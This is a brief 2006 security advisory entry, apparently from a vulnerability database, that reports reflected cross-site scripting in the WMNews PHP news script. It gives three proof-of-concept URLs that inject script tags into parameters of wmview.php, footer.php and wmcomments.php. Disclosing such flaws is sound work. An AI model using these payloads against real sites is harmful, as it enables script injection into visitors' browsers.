WMNews Cross Site Scripting

2006-03-13T00:00:00
ID SECURITYVULNS:DOC:11796
Type securityvulns
Reporter Securityvulns
Modified 2006-03-13T00:00:00

Description


WMNews Cross Site Scripting

Site:http://wartamikael.org/PHPScripts/ Demo:http://www.scriptevi.com/files/demo/news/wmnews/


Credit : R00T3RR0R webpage:www.biyosecurity.be Mail :exalibur33@gmail.com


WMNews

http://victim/path/wmview.php?ArtCat="><script>alert(/R00T3RR0R/)</script> http://victim/path/footer.php?ctrrowcol="><script>alert(/R00T3RR0R/)</script> http://victim/path/wmcomments.php?act=vi&CmID=2&ArtID="><script>alert(/R00T3RR0R/)</script>


Source:

http://www.blogcu.com/Liz0ziM/350164/

http://biyosecurity.be/bugs/wmnews.txt